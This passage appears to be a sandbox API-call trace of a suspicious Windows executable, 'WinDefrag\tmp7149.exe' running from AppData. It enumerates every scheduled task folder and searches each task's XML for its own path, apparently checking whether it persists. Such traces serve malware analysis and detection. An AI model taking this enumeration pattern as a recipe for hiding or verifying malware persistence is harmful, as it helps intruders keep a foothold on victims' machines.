true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload\r\n \r\n \r\n") returned 0x0 [0257.962] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates Office Telemetry Agent, which scans and uploads usage and error information for Office solutions when a user logs on to the computer.\r\n \r\n \r\n \r\n \r\n PT8H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0257.997] IUnknown:Release (This=0x456b30) returned 0x0 [0257.997] IUnknown:Release (This=0x4569f0) returned 0x0 [0257.997] ITaskFolder:GetFolders (in: This=0x456970, flags=0, ppFolders=0x1edc98 | out: ppFolders=0x1edc98*=0x4569f0) returned 0x0 [0257.998] ITaskFolderCollection:get_Count (in: This=0x4569f0, pCount=0x1ede18 | out: pCount=0x1ede18*=0) returned 0x0 [0257.998] IUnknown:Release (This=0x4569f0) returned 0x0 [0257.998] TaskScheduler:IUnknown:Release (This=0x456970) returned 0x0 [0257.998] ITaskFolderCollection:get_Item (in: This=0x456830, index=0x1ede70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppFolder=0x1ede20 | out: ppFolder=0x1ede20*=0x456970) returned 0x0 [0257.998] ITaskFolder:GetTasks (in: This=0x456970, flags=1, ppTasks=0x1edcb0 | out: ppTasks=0x1edcb0*=0x4569f0) returned 0x0 [0257.999] IRegisteredTaskCollection:get_Count (in: This=0x4569f0, pCount=0x1ede00 | out: pCount=0x1ede00*=0) returned 0x0 [0258.000] IUnknown:Release (This=0x4569f0) returned 0x0 [0258.000] ITaskFolder:GetFolders (in: This=0x456970, flags=0, ppFolders=0x1edc98 | out: ppFolders=0x1edc98*=0x4569f0) returned 0x0 [0258.032] ITaskFolderCollection:get_Count (in: This=0x4569f0, pCount=0x1ede18 | out: pCount=0x1ede18*=45) returned 0x0 [0258.032] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x456b40) returned 0x0 [0258.033] ITaskFolder:GetTasks (in: This=0x456b40, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x458070) returned 0x0 [0258.035] IRegisteredTaskCollection:get_Count (in: This=0x458070, pCount=0x1edc70 | out: pCount=0x1edc70*=2) returned 0x0 [0258.035] IRegisteredTaskCollection:get_Item (in: This=0x458070, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x4581d0) returned 0x0 [0258.036] IRegisteredTask:get_Name (in: This=0x4581d0, pName=0x1edb10 | out: pName=0x1edb10*="AD RMS Rights Policy Template Management (Automated)") returned 0x0 [0258.036] IRegisteredTask:get_Xml (in: This=0x4581d0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6002)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n 2006-11-09T03:00:00\r\n true\r\n PT1H\r\n \r\n 1\r\n \r\n \r\n \r\n true\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n false\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {CF2CF428-325B-48D3-8CA8-7633E36E5A32}\r\n \r\n \r\n") returned 0x0 [0258.040] StrStrIW (lpFirst="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6002)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n 2006-11-09T03:00:00\r\n true\r\n PT1H\r\n \r\n 1\r\n \r\n \r\n \r\n true\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n false\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {CF2CF428-325B-48D3-8CA8-7633E36E5A32}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.089] IUnknown:Release (This=0x4581d0) returned 0x0 [0258.089] IRegisteredTaskCollection:get_Item (in: This=0x458070, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x4581d0) returned 0x0 [0258.089] IRegisteredTask:get_Name (in: This=0x4581d0, pName=0x1edb10 | out: pName=0x1edb10*="AD RMS Rights Policy Template Management (Manual)") returned 0x0 [0258.090] IRegisteredTask:get_Xml (in: This=0x4581d0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6003)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n false\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n true\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {BF5CB148-7C77-4d8a-A53E-D81C70CF743C}\r\n \r\n \r\n") returned 0x0 [0258.093] StrStrIW (lpFirst="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6003)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n false\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n true\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {BF5CB148-7C77-4d8a-A53E-D81C70CF743C}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.137] IUnknown:Release (This=0x4581d0) returned 0x0 [0258.137] IUnknown:Release (This=0x458070) returned 0x0 [0258.137] ITaskFolder:GetFolders (in: This=0x456b40, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x458070) returned 0x0 [0258.139] ITaskFolderCollection:get_Count (in: This=0x458070, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0258.139] IUnknown:Release (This=0x458070) returned 0x0 [0258.139] TaskScheduler:IUnknown:Release (This=0x456b40) returned 0x0 [0258.139] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x456b40) returned 0x0 [0258.139] ITaskFolder:GetTasks (in: This=0x456b40, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x457fd0) returned 0x0 [0258.142] IRegisteredTaskCollection:get_Count (in: This=0x457fd0, pCount=0x1edc70 | out: pCount=0x1edc70*=2) returned 0x0 [0258.142] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458120) returned 0x0 [0258.142] IRegisteredTask:get_Name (in: This=0x458120, pName=0x1edb10 | out: pName=0x1edb10*="PolicyConverter") returned 0x0 [0258.142] IRegisteredTask:get_Xml (in: This=0x458120, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-300)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-301)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-302)\r\n Microsoft\\Windows\\AppID\\PolicyConverter\r\n \r\n \r\n true\r\n false\r\n true\r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidpolicyconverter.exe\r\n \r\n \r\n") returned 0x0 [0258.164] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-300)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-301)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-302)\r\n Microsoft\\Windows\\AppID\\PolicyConverter\r\n \r\n \r\n true\r\n false\r\n true\r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidpolicyconverter.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.195] IUnknown:Release (This=0x458120) returned 0x0 [0258.195] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458120) returned 0x0 [0258.195] IRegisteredTask:get_Name (in: This=0x458120, pName=0x1edb10 | out: pName=0x1edb10*="VerifiedPublisherCertStoreCheck") returned 0x0 [0258.195] IRegisteredTask:get_Xml (in: This=0x458120, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-200)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-201)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-202)\r\n Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck\r\n \r\n \r\n \r\n true\r\n PT30M\r\n \r\n PT24H\r\n \r\n \r\n \r\n \r\n true\r\n 10\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n false\r\n true\r\n Queue\r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidcertstorecheck.exe\r\n \r\n \r\n") returned 0x0 [0258.197] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-200)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-201)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-202)\r\n Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck\r\n \r\n \r\n \r\n true\r\n PT30M\r\n \r\n PT24H\r\n \r\n \r\n \r\n \r\n true\r\n 10\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n false\r\n true\r\n Queue\r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidcertstorecheck.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.238] IUnknown:Release (This=0x458120) returned 0x0 [0258.238] IUnknown:Release (This=0x457fd0) returned 0x0 [0258.238] ITaskFolder:GetFolders (in: This=0x456b40, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x457fd0) returned 0x0 [0258.240] ITaskFolderCollection:get_Count (in: This=0x457fd0, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0258.240] IUnknown:Release (This=0x457fd0) returned 0x0 [0258.240] TaskScheduler:IUnknown:Release (This=0x456b40) returned 0x0 [0258.240] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x456b40) returned 0x0 [0258.240] ITaskFolder:GetTasks (in: This=0x456b40, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x458030) returned 0x0 [0258.243] IRegisteredTaskCollection:get_Count (in: This=0x458030, pCount=0x1edc70 | out: pCount=0x1edc70*=2) returned 0x0 [0258.243] IRegisteredTaskCollection:get_Item (in: This=0x458030, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458160) returned 0x0 [0258.243] IRegisteredTask:get_Name (in: This=0x458160, pName=0x1edb10 | out: pName=0x1edb10*="AitAgent") returned 0x0 [0258.243] IRegisteredTask:get_Xml (in: This=0x458160, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\AitAgent\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-702)\r\n \r\n \r\n \r\n 2007-10-08T02:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT3M\r\n PT22H\r\n true\r\n true\r\n \r\n 9\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n aitagent\r\n \r\n \r\n") returned 0x0 [0258.245] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\AitAgent\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-702)\r\n \r\n \r\n \r\n 2007-10-08T02:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT3M\r\n PT22H\r\n true\r\n true\r\n \r\n 9\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n aitagent\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.284] IUnknown:Release (This=0x458160) returned 0x0 [0258.284] IRegisteredTaskCollection:get_Item (in: This=0x458030, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458160) returned 0x0 [0258.284] IRegisteredTask:get_Name (in: This=0x458160, pName=0x1edb10 | out: pName=0x1edb10*="ProgramDataUpdater") returned 0x0 [0258.284] IRegisteredTask:get_Xml (in: This=0x458160, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-702)\r\n \r\n \r\n \r\n 2007-10-08T00:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n 4\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n aepdu.dll,AePduRunUpdate\r\n \r\n \r\n") returned 0x0 [0258.287] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-702)\r\n \r\n \r\n \r\n 2007-10-08T00:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n 4\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n aepdu.dll,AePduRunUpdate\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.329] IUnknown:Release (This=0x458160) returned 0x0 [0258.329] IUnknown:Release (This=0x458030) returned 0x0 [0258.329] ITaskFolder:GetFolders (in: This=0x456b40, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x458030) returned 0x0 [0258.331] ITaskFolderCollection:get_Count (in: This=0x458030, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0258.331] IUnknown:Release (This=0x458030) returned 0x0 [0258.331] TaskScheduler:IUnknown:Release (This=0x456b40) returned 0x0 [0258.331] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x456b40) returned 0x0 [0258.331] ITaskFolder:GetTasks (in: This=0x456b40, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x457fd0) returned 0x0 [0258.333] IRegisteredTaskCollection:get_Count (in: This=0x457fd0, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0258.333] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x4580d0) returned 0x0 [0258.333] IRegisteredTask:get_Name (in: This=0x4580d0, pName=0x1edb10 | out: pName=0x1edb10*="Proxy") returned 0x0 [0258.333] IRegisteredTask:get_Xml (in: This=0x4580d0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%systemroot%\\system32\\acproxy.dll,-100)\r\n $(@%systemroot%\\system32\\acproxy.dll,-101)\r\n $(@%systemroot%\\system32\\acproxy.dll,-102)\r\n Microsoft\\Windows\\Autochk\\Proxy\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT31536000S\r\n false\r\n false\r\n \r\n false\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d acproxy.dll,PerformAutochkOperations\r\n \r\n \r\n") returned 0x0 [0258.336] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\acproxy.dll,-100)\r\n $(@%systemroot%\\system32\\acproxy.dll,-101)\r\n $(@%systemroot%\\system32\\acproxy.dll,-102)\r\n Microsoft\\Windows\\Autochk\\Proxy\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT31536000S\r\n false\r\n false\r\n \r\n false\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d acproxy.dll,PerformAutochkOperations\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.370] IUnknown:Release (This=0x4580d0) returned 0x0 [0258.370] IUnknown:Release (This=0x457fd0) returned 0x0 [0258.370] ITaskFolder:GetFolders (in: This=0x456b40, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x457fd0) returned 0x0 [0258.372] ITaskFolderCollection:get_Count (in: This=0x457fd0, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0258.372] IUnknown:Release (This=0x457fd0) returned 0x0 [0258.372] TaskScheduler:IUnknown:Release (This=0x456b40) returned 0x0 [0258.372] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0258.372] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0258.374] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0258.374] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458030) returned 0x0 [0258.374] IRegisteredTask:get_Name (in: This=0x458030, pName=0x1edb10 | out: pName=0x1edb10*="UninstallDeviceTask") returned 0x0 [0258.374] IRegisteredTask:get_Xml (in: This=0x458030, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)\r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n true\r\n \r\n \r\n \r\n BthUdTask.exe\r\n $(Arg0)\r\n \r\n \r\n") returned 0x0 [0258.376] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)\r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n true\r\n \r\n \r\n \r\n BthUdTask.exe\r\n $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.400] IUnknown:Release (This=0x458030) returned 0x0 [0258.400] IUnknown:Release (This=0x456b40) returned 0x0 [0258.400] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0258.402] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0258.402] IUnknown:Release (This=0x456b40) returned 0x0 [0258.402] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0258.402] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0258.402] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x457fd0) returned 0x0 [0258.405] IRegisteredTaskCollection:get_Count (in: This=0x457fd0, pCount=0x1edc70 | out: pCount=0x1edc70*=3) returned 0x0 [0258.406] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458120) returned 0x0 [0258.406] IRegisteredTask:get_Name (in: This=0x458120, pName=0x1edb10 | out: pName=0x1edb10*="SystemTask") returned 0x0 [0258.406] IRegisteredTask:get_Xml (in: This=0x458120, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\SystemTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query Id=\"0\" Path=\"System\">\r\n <Select Path=\"System\">\r\n *[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]\r\n </Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n PT10S\r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n") returned 0x0 [0258.409] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\SystemTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query Id=\"0\" Path=\"System\">\r\n <Select Path=\"System\">\r\n *[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]\r\n </Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n PT10S\r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n 